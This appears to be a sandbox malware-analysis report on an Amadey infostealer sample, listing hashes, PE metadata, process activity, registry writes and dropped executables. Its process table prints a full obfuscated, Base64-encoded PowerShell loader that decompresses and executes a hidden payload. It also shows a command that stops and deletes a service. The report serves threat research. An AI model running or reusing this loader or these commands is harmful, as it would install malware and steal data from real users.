| File name: | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin |
| Full analysis: | https://app.any.run/tasks/287bd51e-6fa1-4eea-bb85-247242c36829 |
| Verdict: | Malicious activity |
| Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
| Analysis date: | June 21, 2025, 20:14:39 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections |
| MD5: | 968DA28761C83C55811839C954F33D1D |
| SHA1: | 21B9207F6A4D87B3C463250CAAAB2471CC466525 |
| SHA256: | 097446277B4D63FD79CD4EE41EB9A66F46CF9FF5C58BD3C52D3ACFA36BFCE3E9 |
| SSDEEP: | 98304:byi3S7BnWcLIqRQVnmHrgQI9pQTGq4coKogj0YjlPuxNc64MGwQVdkDwf7fqjNtU:0Qm4ggBWabSn |
| .exe | | | Win64 Executable (generic) (64.6) |
|---|---|---|
| .dll | | | Win32 Dynamic Link Library (generic) (15.4) |
| .exe | | | Win32 Executable (generic) (10.5) |
| .exe | | | Generic Win/DOS Executable (4.6) |
| .exe | | | DOS Executable Generic (4.6) |
| MachineType: | Intel 386 or later, and compatibles |
|---|---|
| TimeStamp: | 2022:03:03 13:15:57+00:00 |
| ImageFileCharacteristics: | Executable, 32-bit |
| PEType: | PE32 |
| LinkerVersion: | 14.3 |
| CodeSize: | 203776 |
| InitializedDataSize: | 77312 |
| UninitializedDataSize: | - |
| EntryPoint: | 0x1f530 |
| OSVersion: | 5.1 |
| ImageVersion: | - |
| SubsystemVersion: | 5.1 |
| Subsystem: | Windows GUI |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 416 | find /i "0x0" | C:\Windows\System32\find.exe | — | cmd.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Find String (grep) Utility Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 424 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | nxTpPrk.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MSBuild.exe Exit code: 0 Version: 4.8.9037.0 built by: NET481REL1 Modules
| |||||||||||||||
| 436 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffc4775fff8,0x7ffc47760004,0x7ffc47760010 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: MEDIUM Description: Google Chrome Exit code: 0 Version: 133.0.6943.127 Modules
| |||||||||||||||
| 436 | "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,9675975907000648117,6328650334649942080,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=3204 /prefetch:1 | C:\Program Files\Google\Chrome\Application\chrome.exe | — | chrome.exe | |||||||||||
User: admin Company: Google LLC Integrity Level: LOW Description: Google Chrome Exit code: 0 Version: 133.0.6943.127 Modules
| |||||||||||||||
| 472 | C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "IwAgAGsAJQAmAEcARwBmAFcAZAAwAE4AYwAwAFMAKwBUAEEAagBZAFgAfAB4AHwAcgAuAG8AbgAmAHMAOwBSAFsAZgB7AFAAVwBjAFcAMAAyAGgAYwBFADkALgBrAGEAKwAzAEIAIAAgADQAPQBFAFQAUAAgAFQAbQB4AGEAeQBiACgAQwBLACkAUQBVAGwAYgBXADgAQABTAGcATAA9AF8ALQAsACgAdwBtADcAZgB9AFUAVABPAHwAXwBJAF0AIABlAFQAIwBsAHMAWAA4ADgAPwBAAHMAfABrADcAdQBuADAAUAAxADsAdQBVAHAAewB9AHIAMwBNAFAARQB5ACsAUgA1AHcAbQBvACQAZgBdADkAewAwAGMALAA2AEYALgBlAFkARABdAEoAMgBIAHsANABOAGIAVwBeACUAdgBbAD8AbwBvAEgAKwAqACUAZQBuAEEAdwA6AGQAbwBWAFEAWQB9AE4AagB7ADMAOQBSACgAfAA5AGkAYgB7AFAAbgAtAHIAQwAyAFYANQB2AGsALABFAGYAXQBoACMAVwA9AD4AWgBeAD0AQgAgADgAaQBdAHUAbQArAEIAagBhAGQAOQBmAGUAbgA4ACwAbgBDACoANQB2AG4APwBFAG4ASwA7ACMAVABHADYASgBSAGwANQBKAG4APAAtAD0ALgArAHYAPQAkAF0ANgAsACYAYgBYADUAXgBoAGQAPABZAHQATQBOACkAWwB2ACkAUQBEAD8ARAApAEYARQA0AEkAZwBkACQAXwByAGUALQBjADQAfQAhAHoAIwA0AHgAcwB2AGQAOwBuADYAVQAhADgASABdAFkAXQAwAFkAewBZADAAIwAtADYAOAAzAGYAKgA7ACMAJQBHAHQAVAA3AHUAYQBzAFgAbwApAHYAdQBEAGgATwBvAEoAfQBHAE4APgBNADUAcABDAHoAdgB0AFsAXwA1AEAAWgAgACYAVwByAC4AawAoAEMAXwAuAEwASQBdAFAAJgBUADUAJABJAHoAZABCADIAMABWACkAQQAjAG0AewBRACsAMgApACoAOwBvAEcAcABnAEgAbABJAEoAPgBlADAAOgA+AHIAPQBOAGEAMwBYACgAMQBRADgAKwBWAFUATwAgAGIAYgBIAF0AVwAsADEAJAB6AFAAKQBGADcALQBGAGgARgBSACMAOgBQAH0APAB4AEoAXwBjAHwARgAsAF4ALQB6AHoAQABPAHMARQBHAG0AVQBCAEgAewB5AEQAbgAhAGYAfQBSAEIAMwBOACsAMwAzAF8ASQBbAHUAQgBDAF4AXgAhAEUAaQAjAFEAagBvACwALQBIAHUAagBCAEgANwBxAEcAWgAzACwAMQAlACsAOwBqAEoAQQBUAG8ARQB5AFQASwBtAH0AaABxAF0AVQArAA0ACgAgACAAIAAgACAAIAAgACAAJABhACAAIAAgACAAIAAgACAAIAA9ACAAIAAgACAAIAAgADcANAAwADgAOwAkAGIAIAAgAD0AIAAgACAAIAAnAEMAOgBcAFUAcwBlAHIAcwBcAGEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABtAHAARQAxADQANwAuAHQAbQBwACcAOwANAAoAIAAgACAAIAAgACAAIAAmACgAIAAgACAAIAAgACAAIAAkAHMAaABFAGwAbABpAGQAWwAxAF0AKwAkAFMASABFAEwAbABJAEQAWwAxADMAXQArACcAeAAnACkAKAAgACAAIAAgACAAIAAgAG4ARQB3AC0AbwBCAGoARQBDAFQAIAAgACAAIABzAHkAcwB0AEUAbQAuAEkAbwAuAEMAbwBtAFAAUgBFAFMAcwBJAE8AbgAuAEQARQBmAGwAYQBUAGUAcwBUAFIARQBhAE0AKABbAGkATwAuAG0AZQBNAE8AUgB5AHMAdABSAEUAYQBNAF0AIAAgACAAIAAgACAAWwBjAE8AbgB2AEUAcgB0AF0AOgA6AGYAcgBvAE0AQgBBAFMARQA2ADQAcwB0AHIAaQBuAEcAKAAnAHAAVgBUAFIAYgB0AG8AdwBGAEgAMgB2AHgARAA5ADQAaQBJAGQARQBNAHMAaQBqAGEASgBxAEsASQBwAFcARwBkAHEAdgBVAGEAaABWADAAVwB6AFgARQBnADAAbAB1AFMAVABUAEgAagBoAHkAbgBEAFMAdgA3ADkAOQAwAGsAWgBvAFUAdQBHADAAVgA3AGkAZQArAE4ANwBYAFAAdQA5AFQAbgAyAEsAQQB5ADcAdAA2AHMAVQBTAFAAVQBkAHcAMwAwAHMAWQB4AE0AcgBTAFUANwBiAHIAYQBNADgAaQArAFcAUwBUAEYAZQBaAGcAVwBSAEkAdAByAFAAZQBKAEoAYwBtAFQAcQBCADMASwBRADEAbwBsAFUANQBCAFAAOABRAEIAWgBNAFAAVwBVAFoAbwB2AFIAQgB5AFEAUQBQAEEAcwBJADMAZABQAEoARgBBAHkATQB5AFMAUABwAFMARQBqAGoAeABXAE0AcwBUADQAOQBLADQATQBCAFkAOQBTAHYALwA3AHkAbgA0AHkAcgBvAE0AMwBwAGUAQgBXADgAWgBJAHMAMwBHAFEAbAB3AG0AcQBkAEwARwBhAFgAOABIAEwAVQBFAGMAOQA5AHYAdQBQAEQAUABjAEkAQQBFAFUAeQBDAHcASgBGAG4AQgBqAE4AUABtAFUAZwByAHoAUgBDAGsAdgBJAG4ASQBxAHIAbwBBAHUAbABCAEYAbgBSAEsAdgB2AGgAdgBoAGEAdgAyAHUAVQBMAGwAYwBGAEgATABrAE0AQgBqAGkAVQBvAFgAbwAxAGcATgAzAHkASgB0AGMAbQA1AEcAQQBtAGgAZwB2AFAAaQBOAHcAeQAxAHcAYQBhAHcAZQB1AEQAMQBzAEQAaQBzAHoASwA4ADYATgBtAEMANwB2AG8AWgBFADYAVgBVAEQAegBXAEoAbABZAEQAWgAvAEoAbABLADUAVgBlAE4AQQBNAHQAcwBQADAAaABrAEkAVABHAE4ASABuADIAMwAwADMAMQB3AFgASQBzACsAaQBTAC8AUwBOAHoAbwBQAFMAagBUADQAUABJAHYAZwBYADQAYQBIAGkAKwBCAHEANABnAFEAbQBlAG0AWQBIAGIAQwBKAFAAdwA3AHcATABaAG4ARwArAEMAUgBUADAAUgBiAFAATABRAGYAWABhADkASgBhAHUAYQBtAE4AUgBHAFQARABjAEsAaABPADYAVAAzAFIARgA1ADIAMwBZAGQAcgBjAC8AVwAvAG4AcQA4AFAAcQBmADMAWABHAFIAQQAwAHgASQB2AHYAbgBjAGkAegA2AHYAWAA5ADcANwBoAEYAWABNADEAbQBCAHcAYgBxAE4AWQBNAEwAVgBEAGkAdgBYAEIAWgBSAEwAZQAyADAASwBvAEEATgArAHgAZABnAFYAeQBhAGkATABMAGkARwBPAC8AYQBtAGgAVgA5AEgARABBAGIATQBNAHUAVQA3AEQASQA5AGIAZABzAC8AYwBvAGMANwB6AEQAKwByAHAAdABTAFEANABMADQAMwBmADMAZwBpAG8AZwBsADEAcgBDAHIAYgB4AEEATgBXAGUAVQBHADUAZQA4AEQAeAB6AFMAbgBoAEgANABjAGwAZQBvAE8AOQBTAC8AegB3AFoAVgA4AGwAOAB1AE4AKwA1AEIASwB5ADIAVgBpAE4AVgBlADgASAB0AEMASQBZAHIAOABGAE4AdQAwAEkAdwBKAE4AagBOAHQAOAArADcARgBzAEUAYwBJAGsATAB6AEoASABhAEYAYwAxAGgAWgArADUAUgAwAHIANwBoAGMANQBuAHcASgB4AEoAOQBHAFgASwBlAHQAbwAwADcAbwB6AFgAdwBsAEgAMABDAGIAKwBjAG4ASgBoAFYAYgBKAEcAYwAvAGcAMwBXAEIAcQBOAEQANwBzAGoAdgBNAEIAVABCAGYAbgBEAGEAQQBBADMAUQBsAC8ASgBKADIARgA2ACsASwAxAHUAcwBQAFYARQAyAGQAVwBuAHYAbAB4AGYAOQA3AGgAdABCAFAAaQA3ADEAOAA9ACcAIAAgACAAIAAgACkALAAgACAAIAAgACAAIABbAHMAeQBTAFQAZQBNAC4ASQBvAC4AQwBPAG0AUAByAGUAUwBzAGkATwBOAC4AYwBPAG0AcAByAGUAUwBTAGkATwBuAE0AbwBkAGUAXQA6ADoAZABFAEMAbwBtAHAAcgBlAFMAUwAgACAAKQB8AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAlACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACMAIAA8AFUATQAkAHIAYgBWACwASAA2ADQAQgBxAHcAawBLADIAVgBBAEwAbwA8AEoAdABrAFoAJAB9AGYATQBAAE8ATwA6AFcAOwBjAFMASgAyAEIANgB8AF4AbABVAC0AUgBJAF0ASAB9AE0AawBtADMATQBjACwAeQAtACUAXgBkAHgAfAAoADMAbgBrACsATQBPAGMASABYADcAVQBxAC4AcAAjAHwAPABZAGkAZwBYAGgAMABLAGMAZABdADYASwAhAEgAOgB5AG0AUgArADkAawAgAG4AWgBiAHYATQA5ACgAbgBCAGoAfABjAHAAbgBFAGgARABLAEkAegA2AE8AJQBRAD0AMgBsADMAMwAuACgAdQByADgAZwBdAFEALABSADUAYQBMAEUAZwA9ADUAWgB0ACUAUwB2AE0AWgBKACYAKgBSAFIALgBnACYAWgB8AFEALAB6AG8AcgBvAEMAbABzAHkAKQAxAE0ARQBHAHMAMABAAEAAJQBhAFEAQwByACgARwBuAD0AawBpAGsAJAA3ACkANwAkAFgATABzAE4AQQAgAF8AJQBbAGkAXgAqADAAdwArAFAASAA+AEQAQAA3AHYAcABSACQAOgAxAEwAXwBeAGYAdABNAFoAKwB3ACoAPgA3AEAAKgArAEQASwArAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABuAEUAdwAtAG8AQgBqAEUAQwBUACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBPAC4AcwB0AFIAZQBhAG0AcgBlAGEAZABFAFIAKAAgACQAXwAsAFsAUwBZAFMAVABlAG0ALgBUAGUAeAB0AC4AZQBuAGMAbwBEAGkATgBHAF0AOgA6AEEAcwBjAGkASQAgACAAIAAgACAAIAAgACkAfQAgAHwADQAKACAAIAAgACAAIAAgACAAIAAjACAALAAqACMAKQA5AEoAZQBOADcAVQBVAHQAfABeAGoAcwByAC4ATABTAD0AJgBqADIAeQAoAGIAJQAqAC0AYwBnACEAaABNADAAeQBAAEgAOAAmAH0AUABfAGwAVgAtAEQAVgAsAGcAMwByAGsAZQBWACgAfQBmAFoAWwA6AH0AXwBeAFEAOgAlAGoAXQBvAGYAUABNAHYARgBoAG4AZgA+AHEAOwBVACYAMAB3AGEANgA4ADwAeQB8AE0AcQBjADQAIABTAFMAaQBaACQALgBLAHYANABdAEQAbgAqAE8ARABqAEEAewBPACYAMABjAEQAXQBLAFoAZQAoAEQASABDAFYAcQAuAEUAbgBNAEgAOgB8AGUAMQA9AFEAMAAwAD0AZwBDAF0AQgBeAHsAPwB2AHcAMwBiADEALgBjADgAfABbAC0ARABQAGYANABVAHEAPQBbAGYAegAzADYAVwA/AGsARgB7AG4APwAzAG0APQA1AH0AewB9AGIAdAB8AF8AXQBsAHAAQgAhAHEAcAB1AFcAbQBPAFgAYgBDADQARgB5AHcAagBjAEMARwA6AHkAZgAwAHEAawBnAEwAXgAwACgAYwBQAHAAJQBQAEQAUwA1AF0AaQBpAF8AOQBkACsANwA2AFsAOgBFAGMAWAB6ADQAaQBFACYARwBLAF8AKQBKAGoASQBHAD0ASwAuAEgANQBmAHkAXwBvAHgAYwBpACwAUwBAAGoAJQAxAHwATgAmAG8AagBvACsAMwBuADUARwANAAoAIAAgACAAIAAgACAAIAAgACUAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACMAIABVAEkATQBkAEoAbABnADIAbgBeACAAawA6AEMAbgA6AFMAJgB3ACEAbwBGAHUAbQAzAFAAKQBNAHUAMwB6ACAAUQBhACMAJgBIAF0AcQBPAEsALAB0AHUAWgBLAEcAMQA9ACYAOwA2ACUASQAtADQAMQB9ACQAaQArAFsAbgB3AGQASQAzAHwASwBuAF0AXQBQACYAcABtAFUALAAxACkAewA+AGIAVABrAFgANwBjAHkAWQApACMASwBOAEQAJQBqAGoANQBmAHMAKwAuAHQATAA/ACQAJAArAGgAXwBOADIARAB7AF4AawBvAH0AMQBaAHUAcAArAEQAeABRAFUALQBxAFcAKQBmADIAJABUAHsAIAAsAG4AJAAyAGoAZQA2AF8ALABQAHkAKABqAGsAQwBPAEQAeQApAFkASQAmAG8AaABGAEYALQBWAHYAMwBWAFYAOgBRAFsAcQBZAHUAUABtAE8AUQBTAEEAIABOADYAbABUADIAOQB5AHMARgA6ADEAPAAqAEUAKABRADwAQwAwAEsARQBGAD4AYwBpAC0ARwBHADYAcQBCAGcAOABJACMAQQAsAHMAKABTAFcAbAA8AFkAPABiAHwAZABHACsAJQA/AFEAKQBtAGQAXwByAGcAXQBGAF0AWwBUADsATQB5AFEAagBJAHAAIABZACUAeQBRAF8ASwBDACUAQwAyAEoAMQBOAFAAQABjADkAPABAADwAdQA7AEgAZABrAGgAIwBxAFYANAAoADQASAA4ACkARgBpADUAUgArAEoAMwA3AEMAPwBLAF4AdABPAEAANgA8ACUAKAAsAHsAQgAtAFAATwBPAC0AdQA7ACgAVgBRAHMAPgA3AFUALgA1AEkAOAAjAEoAewBnADwATQBuADcASwA5ADMAZQBAAEQANgBsADAAXgBRAGQAJABhADsAZABDAFMATgBuAGcAWAA3AEgASgB5AGQALQB0AHYAegBdAHsALABeAGwAOgBOAD4AcgBrAHIAVgBVAGMAWABnADUAawBJAGoAOgBtAF0AXwAmAHIATgByAF4AKQBUAHcAdQBlAF8AOgBbADEALQBjADwAPgAoACUASAByACwAPgB2AEsAQwAmAFQAQwBoAFQAewBzAD8AZQBAACwAXwB7AG4AIwAlAC0AbQB6ACUAaAAjAD0ANgBVAGwAZQBzAD8AVQAgAFIAZQBaADwAUAA6AFIARgB0ADkAMQA5AG4AOAB7ACQAYgBPACgAIABFAE8ANAB7AFAAWgB2AHUATQBiAGQAbAArADAAXQB7AD8AewBzAEYARwAyAG8AbgAkAHQAKABpAD8AcABiAFQAJQBsAEgAKQBWADcALABdAHsAdgA3AHEAcwBTAFcANgBZAG0AVwA3AEUAbwBCADkAQAB8ACgASgBHAGkAIQBEAEAAOwBBAEIAMQAoAC4AbQAgAEkAIAB8AFgAYgBoAGkAZgAlAGkAWgBIAGoAVAB8AHwAIAB3AEEAUAB2AHcAKgA4AFgAZAApADoAMAA1ADUAVQBtAGkAfQBOADAAcABiAEsANgBQACMARAAzAFsAQQBGAGMAWwA1ADUAOgA+AG8AUgA+AH0ADQAKACMAIAAwAHMAbABUACwAMABFAGwAZABCAGsAWAB7AFQAWQBCAGUASwBbADEAYQA9ACEAUAAoAD0AIABYAFcANABdAE0AVwBIADgAcQBPADIAMgBYAFgAMQB2AE0AMQAsAD8AMgBYAD8AUAA1ACUAZgBBACAALQBeAHgAQwBhAEMAYwA9AFQAewA5AGwAUgB0AC0ARwBkAEwAbwB7ADkASQA4ACsAbgBCAEUAZABKAHIAPgBFADAAbABlADgAUwBfACgAbgA6AEoAQgB5ADYARwBDAEcAeQBEAF4AewB8AFEATABPAHYALQA+ACUASwA7AGgAeQB3AG4ASQBSADgAegBJADkAdgAlAHYAUgBZAFEAeABOAGYATgBzAGwAPQBYADoAagBnAHwAfQA1AEkALAApAHoALQA/AGsASQBsACAAXgBwAHQAaABbACYAZABHACMAXQBdAHAAJgBfADAASgA4AFsASgBDAGYAbgBCADwAewBCAFIAMABQAHgAOgBBAD4AUABoAGUARQBdADAAJgBUADYAeABTAGMAOwBbAHUAPwBDAEYAQQBwAFQAbgBzAGsAZABNADkAZwA9AGgAUQBBAGMAYQBKACkATABMAD8ARAA4AEIAeQAsADsAOQB9AGMANwA6AHwAXQA5ADMARABnAGEANwAtAC4AIAB3AFMANwBPAG0ATQBkAD0ATQBkADMAUwBkAFgAUQA7AEAAIAApAEEAVABeAC0ATgBJAHgAdABIAGgAQgBCAEkAdwBLAGcAZABoAGIAdgA2AGYAbwBDADgAOgAyAEQAPgAmAFoALAApAFgASQA6ADgANQA8AGoAcgAtAGEAUQB8AHEAXgBEAFIAWAAsAGgAXwAuADsAOwA4AHsAYQBBACkASAAhAGEAQQBlACsAQABXAGoAJgBrADgALQBPACEAcwArADEAVQAyAEsANABmAF8ARgBuAE0AUQBnADcAdgBEAFgARABUAFsAZgB8AEwAQABqAEoAIAByAEEASAAtADgAYQA5ADQAdwBDAFMAdgBzAGMAQQBjAGUAJgBRADoAcwAyAHsAWQBBAE8AdwB7AHsAaQArADcAQQA/AF8AbwA4AGQAfQBFAF4AKgBIAFYAWAB0AC0AUQAuAC0AbAAjACQAeQBMAGIAbgB4ACUALQA7AHkAXQApAHwAeABPAE4AZQBrACYAbwBwADQATwBNAEYAOgAzACkAZABSAEMAJAB9AD8AQABtAEcAPgBSAEsAbAAqAFEAMQBWAEEAZAAhAEwAWgA5AHkAWgA7AFYAKwA2AEYAWwBaAEoALQBtAD0AdQAmAD4AOwB8AGkANABxAFoAXgBbAGUAKABOAHIAbABPACgAcwBrAGkAUQBiAHMAXwA9AF8APQBXAD8AXgBTAC0ALgBGAGoAbgB3ACYAVwBSAHMAXQB3AHYAWQAyAEUASQBrADIAXQBqAG8AVQBeAE0ANgBpAFIAWwAkAEQAVgBWACQALABbAEAAaQBvAFAAZwBEADQAIwBhAHkAdQBkACAAOQA6AE4ASgBJAFkAJABMAE4AOgBsADgAOQBmAGkAZwB8AFMATwAsAGQAegB3AEoATwBhAD8AfABNADgANQBjAF4AKABrAD0AUAAxADIAPABZAEEAVAAgAFgARwBqAFYAOAA5AHYANAA1AH0AbgBwAD0AOgAoAHQAdAA3ADAAawBJAHIAKAAzAGgARwAhAFgAIwBEAHcAewBEACUAUABtAF0AZwAhADgARgB5AEEAJAAjAEAAIAB2AG0ALAA0AF4AZgAtAE0ANQBvAGQAQgB2AEcAKwB1AGEASwBNAEAAcgByAFcAXgBHAGMALgBFACgAPgBZAHMAUwBnAFIAZABRACUAMABEAA0ACgAgACAAIAAgACAAIAAgACAAJABfAC4AUgBlAGEARABUAE8AZQBOAGQAKAApACAAIAAgACAAIAB9ACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | MSBuild.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 480 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 516 | "C:\Temper\76EOElBE.exe" | C:\Temper\76EOElBE.exe | — | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 516 | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.92 --initial-client-data=0x294,0x298,0x29c,0x288,0x2a4,0x7ffc4249f208,0x7ffc4249f214,0x7ffc4249f220 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Exit code: 0 Version: 133.0.3065.92 Modules
| |||||||||||||||
| 592 | "C:\Windows\System32\cmd.exe" /c sc stop IObitUnlocker & sc delete IObitUnlocker | C:\Windows\System32\cmd.exe | — | Unlocker.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 1060 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 592 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | schtasks.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000702C8 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000802C8 |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000802C8 |
| Operation: | delete key | Name: | (default) |
Value: | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000702C8 |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop |
| Operation: | write | Name: | IconLayouts |
Value: 00000000000000000000000000000000030001000100010010000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C00000010000000000000006D006F00760065006D006100700073002E006A00700067003E002000200000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C000000110000000000000061006C006F006E00670064006100740061002E0070006E0067003E00200020000000130000000000000062006F00740074006F006D006300610062006C0065002E007200740066003E0020002000000012000000000000006D0075007300650075006D006C006500730073002E006A00700067003E00200020000000110000000000000070006C00610079006300680069006E0061002E007200740066003E002000200000001500000000000000730065006E0069006F007200730075006D006D006100720079002E0070006E0067003E00200020000000120000000000000073006800610072006500610067007200650065002E006A00700067003E00200020000000140000000000000077006800650074006800650072006300680069006E0061002E007200740066003E002000200000004C0000000000000030003900370034003400360032003700370062003400640036003300660064003700390063006400340065006500340031006500620039006100360036006600340036006300660039006600660035006300350038006200640033006300350032006400330061006300660061003300360062006600630065003300650039002E00620069006E002E006500780065003E00200020000000010000000000000002000100000000000000000001000000000000000200010000000000000000001100000006000000010000001000000000000000000000000000000000000000803F0000004008000000803F000040400900000000000000404003000000803F000080400A000000803F0000A0400B0000000040000000000C00000000400000803F0D0000000040000000400E00000000000000803F01000000000000000040020000000000000080400400000000000000A04005000000803F0000000006000000803F0000803F070000000040000040400F00 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop |
| Operation: | write | Name: | IconNameVersion |
Value: 1 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\OneDrive\Accounts |
| Operation: | write | Name: | LastUpdate |
Value: B912576800000000 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000C02E4 |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (1180) nircmd.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.FriendlyAppName |
Value: Windows Command Processor | |||
| (PID) Process: | (1180) nircmd.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.ApplicationCompany |
Value: Microsoft Corporation | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3780 | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin.exe | C:\Temper\76EOElBE.exe | executable | |
MD5:849FAD50B0B67FF67A1EB27698EE2D61 | SHA256:F7304988F5311FC541E547178B90CB33C4A8F4982B2AF838A3085771035EB533 | |||
| 6520 | pJNMEHWu.exe | C:\Temper\1uP5ZkiR.exe | executable | |
MD5:26CC5A6CFD8E8ECC433337413C14CDDB | SHA256:2D904D576B46236BAF504DBA21775F6EBBBD0F65272A9C2FCA1C6798184FA4E8 | |||
| 3780 | 097446277b4d63fd79cd4ee41eb9a66f46cf9ff5c58bd3c52d3acfa36bfce3e9.bin.exe | C:\Temper\N8z6GQBM.zip | compressed | |
